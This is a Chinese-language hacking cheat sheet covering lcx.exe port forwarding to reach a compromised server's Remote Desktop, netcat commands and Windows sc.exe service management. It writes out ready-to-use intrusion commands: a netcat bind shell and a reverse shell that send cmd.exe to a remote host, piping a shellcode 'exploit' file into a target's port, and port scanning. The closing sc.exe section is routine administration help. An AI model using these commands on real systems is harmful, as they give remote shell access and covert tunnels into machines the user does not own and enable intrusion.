cmd:执行命令的载体cmdshell
lcx:端口映射工具
1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口
2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口
3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器
nc:监听工具
A:基本用法
1.连接到REMOTE主机
格式:nc.exe -nvv 192.168.2.2 80
讲解:连到192.168.2.2的TCP80端口
2.监听LOCAL主机
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3.扫描REMOTE主机
格式:nc -nvv -w2 -z 192.168.2.2 80-445
讲解:扫描192.168.2.2的TCP80到TCP445的所有端口
4.REMOTE主机绑定SHELL
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5.REMOTE主机绑定SHELL并反向连接
格式:nc -t -e c:winntsystem32cmd.exe 192.168.2.2 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.2.2的TCP5354端口
B:高级用法
6.作攻击程序用
格式1:type.exe c:exploit.txt|nc -nvv 192.168.2.2 80
格式2:nc -nvv 192.168.2.2 80
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:ex ploit.txt'的内容(两种格式确有相同的效果, 真是有异曲同工之妙:P) 附:'c:exploit.txt'为shellcode等
7.作蜜罐用[1]
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8.作蜜罐用[2]
格式:nc -L -p 80>c:log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:log.txt'中,如果把'& gt;' 改为'>>'即可以追加日志 附:'c:log.txt'为日志等
1、SC可以 检索和设置有关服务的控制信息。可以使用 SC.exe 来测试和调试服务程序。
2、可以设置存储在注册表中的服务属性,以控制如何在启动时启动服务应用程序,以及如何将其作为后台程序运行。即更改服务的启动状态。
3、SC 命令还可以用来删除系统中的无用的服务。(除非对自己电脑中的软硬件所需的服务比较清楚,否则不建议删除任何系统服务,尤其是基础服务)
4、SC命令 的参数可以配置指定的服务,检索当前服务的状态,也可以停止和启动服务(功能上类似NET STOP/START命令,但SC速度更快且能停止更多的服务)。
5、可以创建批处理文件来调用不同的 SC 命令,以自动启动或关闭服务序列。
SC.exe 提供的功能类似于“控制面板”中“管理工具”项中的“服务”。
命令:
query-----------查询服务的状态,
或枚举服务类型的状态。
queryex---------查询服务的扩展状态,
或枚举服务类型的状态。
start-----------启动服务。
pause-----------发送 PAUSE 控制请求到服务。
interrogate-----发送 INTERROGATE 控制请求到服务。
continue--------发送 CONTINUE 控制请求到服务。
stop------------发送 STOP 请求到服务。
config----------(永久地)更改服务的配置。
description-----更改服务的描述。
failure---------更改服务失败时所进行的操作。
qc--------------查询服务的配置信息。
qdescription----查询服务的描述。
qfailure--------查询失败服务所进行的操作。
delete----------(从注册表)删除服务。
create----------创建服务(将其添加到注册表)。
control---------发送控制到服务。
sdshow----------显示服务的安全描述符。
sdset-----------设置服务的安全描述符。
GetDisplayName--获取服务的 DisplayName。
GetKeyName------获取服务的 ServiceKeyName。
EnumDepend------枚举服务的依存关系。
下列命令不查询服务名称:
sc
boot------------(ok | bad) 表明是否将上一次启动保存为
最后所知的好的启动配置
Lock------------锁定服务数据库
QueryLock-------查询 SCManager 数据库的 LockStatus
示例:
sc start MyService
您想查阅 QUERY 和 QUERYEX 命令的帮助吗? [ y | n ]:
这是自带的帮助
如果要删除一个已经存在的服务就是
sc delete servername